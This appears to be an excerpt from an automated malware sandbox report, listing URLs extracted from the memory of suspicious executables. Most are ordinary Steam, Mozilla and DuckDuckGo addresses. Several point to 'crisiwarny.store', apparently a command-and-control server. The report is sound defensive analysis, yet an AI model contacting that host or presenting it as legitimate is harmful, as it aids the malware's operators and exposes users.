Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=h6HMV-M6cfAX&a
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&amp
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&l=englis
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=KLqJaM1v
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=_zjj
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=0IXKH44IpF1u&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&l=engl
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=english
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=Gr5o1d5GQef0&l=en
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=IJn7qVh5q-RP&l=e
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=HNbD--FePQTr&l=english
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=engl
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=en
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&am
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4Lb
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3090918742.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/8
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/apiv
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
